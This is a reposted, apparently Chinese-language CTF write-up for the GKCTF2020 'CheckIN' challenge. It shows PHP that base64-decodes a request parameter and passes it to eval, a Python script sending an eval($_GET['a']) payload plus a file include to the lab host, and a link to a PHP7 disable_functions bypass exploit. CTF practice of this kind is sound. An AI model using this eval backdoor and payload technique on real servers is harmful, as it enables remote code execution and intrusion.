首页 > 其他 > 详细

[GKCTF2020]CheckIN

时间:2020-05-25 17:07:25      阅读:356      评论:0      收藏:0      [点我收藏+]

https://www.gem-love.com/ctf/2361.html#CheckIN
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()[‘Ginkgo‘];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();
import requests
from base64 import *
from urllib.parse import quote as q

payload = "var_dump(include(‘/tmp/1.txt‘));"
#url = "http://8727791d-0b5b-41f6-a3c4-e33252808486.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a="

#payload = b64encode(payload.encode())
payload = q(payload)
r = requests.get(url+payload)
print(url+payload)
print(r.text[3053:])

[GKCTF2020]CheckIN

原文:https://www.cnblogs.com/youmg/p/12957708.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!